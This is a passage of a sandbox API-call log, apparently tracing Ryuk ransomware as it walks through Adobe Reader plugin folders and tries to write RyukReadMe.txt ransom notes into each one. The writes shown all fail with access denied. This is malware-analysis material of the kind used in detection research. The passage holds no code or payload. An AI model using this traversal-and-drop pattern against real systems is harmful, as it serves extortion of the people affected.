10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.816] GetLastError () returned 0x5 [0138.816] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.816] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.816] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.816] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.817] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.817] SetLastError (dwErrCode=0x0) [0138.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.817] GetLastError () returned 0x5 [0138.817] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.817] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.817] SetLastError (dwErrCode=0x0) [0138.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.817] GetLastError () returned 0x5 [0138.817] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.817] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.818] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.818] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.819] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.819] SetLastError (dwErrCode=0x0) [0138.819] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.819] GetLastError () returned 0x5 [0138.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.819] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.819] SetLastError (dwErrCode=0x0) [0138.819] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.819] GetLastError () returned 0x5 [0138.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.819] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.819] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.819] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.820] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.820] SetLastError (dwErrCode=0x0) [0138.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.820] GetLastError () returned 0x5 [0138.820] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.820] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.820] SetLastError (dwErrCode=0x0) [0138.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.820] GetLastError () returned 0x5 [0138.820] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.820] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.822] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.822] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.823] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.823] SetLastError (dwErrCode=0x0) [0138.823] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.826] GetLastError () returned 0x5 [0138.826] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.826] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.826] SetLastError (dwErrCode=0x0) [0138.826] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.826] GetLastError () returned 0x5 [0138.826] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.826] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.826] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.826] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.827] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.827] SetLastError (dwErrCode=0x0) [0138.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.827] GetLastError () returned 0x5 [0138.827] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.827] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.827] SetLastError (dwErrCode=0x0) [0138.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.827] GetLastError () returned 0x5 [0138.827] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.827] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.831] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.831] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.832] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.833] SetLastError (dwErrCode=0x0) [0138.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.835] GetLastError () returned 0x5 [0138.835] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.836] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.836] SetLastError (dwErrCode=0x0) [0138.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.836] GetLastError () returned 0x5 [0138.836] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.836] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.838] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.838] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.839] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.839] SetLastError (dwErrCode=0x0) [0138.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.842] GetLastError () returned 0x5 [0138.842] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.842] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.842] SetLastError (dwErrCode=0x0) [0138.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.842] GetLastError () returned 0x5 [0138.842] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.842] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.844] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.844] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.845] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.846] SetLastError (dwErrCode=0x0) [0138.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.848] GetLastError () returned 0x5 [0138.848] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.848] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.848] SetLastError (dwErrCode=0x0) [0138.849] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.849] GetLastError () returned 0x5 [0138.849] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.849] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.850] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.850] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.851] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.854] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.855] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.855] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.855] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.855] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.856] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.856] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.856] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.856] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.858] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.858] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.859] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.863] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.864] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.864] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.865] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.868] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.868] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.869] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.871] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.871] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.871] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.872] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.873] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.885] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.888] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.889] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.889] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.890] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.890] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.890] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.890] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.890] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.891] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.891] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.891] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.892] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.892] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.894] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.894] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.895] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.895] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.896] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.896] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.896] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.896] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.897] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.897] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.897] FindClose 